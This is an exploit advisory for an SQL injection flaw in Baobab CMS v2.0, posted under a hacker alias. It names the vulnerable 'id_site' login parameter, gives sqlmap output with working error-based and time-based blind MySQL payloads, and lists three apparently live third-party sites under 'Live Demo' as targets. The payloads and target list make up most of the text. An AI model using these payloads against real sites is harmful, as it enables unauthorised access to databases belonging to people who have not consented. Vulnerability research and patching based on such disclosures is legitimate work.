###################### # Exploit Title : Baobab CMS v2.0 SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Vendor Homepage : http://www.milkyweb.fr # Version: 2.0 # Tested on: [ WINDOWS 7] # MyBlog : http://xbadgirl21.blogspot.com # skype:xbadgirl21 # Date: 02/10/2016 # video Proof : https://youtu.be/XHpDpFfI9dM ###################### # [★] DESCRIPTION : ###################### # [+] Cet outil d’administration vous permet de mettre à jour rapidement # [+] facilement et sans compétence technique, la quasi-totalité du contenu de votre site internet.. # [+] AND an SQL injection has been Detected in Baobab CMS ###################### # [★] Poc : ###################### # When You want to login You Will Notice id_site Parameter # [id_site] Get Parameter Vulnerable To SQLi # http://localhost/admin/accueil/identification.php?id_site=[SQLi] ###################### # [★] SQLmap PoC: ###################### # GET parameter 'id_site' is vulnerable. Do you want to keep testing the others (if any)? [y/N] # # --- #Parameter: id_site (GET) # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) # Payload: id_site=3 AND (SELECT 6982 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(6982=6982,1))), # 0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) # # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: id_site=3 AND SLEEP(5) # --- ###################### # [★] Live Demo : ###################### # http://www.generationcampus.com/administration/admin/accueil/identification.php?id_site=3 # http://demontille.milkyweb.fr/admin/accueil/identification.php?id_site=17 # http://baobab.milkyweb.fr/admin/accueil/identification.php?id_site=1 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################